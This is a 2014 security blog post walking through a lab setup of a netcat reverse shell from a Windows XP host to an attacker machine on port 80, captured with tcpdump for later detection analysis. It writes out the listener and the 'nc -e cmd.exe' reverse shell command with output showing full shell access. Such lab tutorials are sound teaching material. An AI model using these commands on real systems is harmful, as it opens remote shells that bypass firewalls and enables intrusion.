Monday, September 1, 2014

Setup and detect netcat reverse shell

In most cases (if not all), a firewall is typically placed between the Internet and the internal network. While a firewall helps in keeping out the bad guys, what happens when the bad guys are already in, is another issue.

In this post, we will assume, the bad guy has already gained access to a system on the internal network. In addition, since we know most firewalls have port 80 open, we will send a (reverse) shell outside of the firewall to our bad guy. If we have an IPS in place this should detect this type of traffic. However, if not our firewall will more than likely allow this traffic through.

Our topology for this lab will be as follows:
Windows XP host - internal network 10.0.0.100
Bad guy - Internet - 10.0.0.101

While performing this lab, we will also capture the traffic using
root@securitynik:~# tcpdump -nnvvi eth0 port 80 -w netcat.pcap


NetCat Listener on bad guy: 
root@securitynik:~# nc -nnvl -p 80 -4
nc: listening on 0.0.0.0 80 ...

Now that we have our netcat listener and we already have access to the computer on the internal LAN, let's send the shell outside of the firewall. 

C:\nc>nc -nnvv 10.0.0.101 80 -e c:\windows\system32\cmd.exe
(UNKNOWN) [10.0.0.101] 80 (?) open

As can be seen the connection was opened successfully. If we look at the console of the bad guy's computer we see the following

root@securitynik:~# nc -nnvl -p 80 -4

nc: listening on 0.0.0.0 80 ...
nc: connect to 10.0.0.101 80 from 10.0.0.100 1059
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\nc>

From the above, we see we now have full shell access to the system. To confirm what we've done, let's use the next post to analyze our traffic.

Reference:
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
http://en.wikipedia.org/wiki/Netcat

2 comments:

  1. Replies
    1. :-) It's right here.
      https://www.securitynik.com/2014/09/analysing-netcat-reverse-shell-using.html

      You did not ask for part 3 but here it is:
      https://www.securitynik.com/2014/09/analysing-netcat-reverse-shell-using_1.html

      thanks for visiting.

      Delete